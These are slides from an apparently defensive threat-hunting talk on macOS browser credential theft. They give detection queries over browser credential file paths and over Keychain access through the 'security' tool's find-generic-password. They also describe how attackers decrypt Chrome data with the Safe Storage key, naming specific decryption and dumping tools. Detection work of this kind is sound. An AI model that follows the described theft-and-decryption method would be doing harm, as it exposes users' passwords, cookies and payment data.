10 2 Browsers credentials theft. Let’s hunt it! Search for paths to the browser credentials storage in the command lines: dev_os_type:macos AND cmdline:("*/Library/Safari/Form Values/*" OR ("*/Firefox/Profiles/*" AND "*login.json*") OR "*/Library/Application Support/Google/Chrome/Default/Login Data*" OR "*/Google/Chrome Beta/Default/Login Data*" OR "*/Chromium/Default/Login Data*" OR "*/Microsoft Edge/Default/Login Data*" OR "*/BraveSoftware/Brave- Browser/Default/Login Data*" OR "*/com.operasoftware.Opera/Default/Login Data*" OR "*/com.operasoftware.OperaGX/Default/Login Data*" OR "*/Vivaldi/Default/Login Data*" OR "*/Coccoc/Default/Login Data*" OR "*/YandexBrowser/Default/Login Data") 

Decryption of stolen browser’s data • Chrome encrypts all user data files with a key stored in the login keychain. • Cookies • History • Passwords • Saved Payment information • The encryption key is base64 encoded and stored as the Chrome Safe Storage key in the User's Keychain • Attacker can get this key from the grabbed copy of the login keychain • Another way to get Chrome Safe Storage is to use security tool with “find-generic-password” option • After obtaining the key ChromeCookieDecryptor tool (https://github.com/marx-yu/ChromeCookieDecryptor) can be used to decrypt data 10 3 

10 4 HackBrowserData credentials dumping tool HackBrowserData gets the chromium master key from the keychain using security tool with “find-generic-password” option: 

105 Using security tool to get browser’s master key. Let’s hunt it! Search for security tool usage to get browser’s master key from user's Keychain: dev_os_type:macos AND cmdline:*security* AND cmdline:("*find-generic-password*" OR "*find-internet-password*") AND cmdline:(*Chrome* OR *Chromium* OR *Opera* OR *Safari* OR *Brave* OR *Microsoft Edge* OR *Edge* OR *Firefox*) AND -proc_p_file_path:("*/Applications/Keeper Password Manager.app/Contents/*" OR "*/Contents/MacOS/Keeper Password Manager Helper*") 

10 6 To be continued… Privilege Escalation, Defense Evasion, Discovery AND Lateral Movement 

10 7 Questions?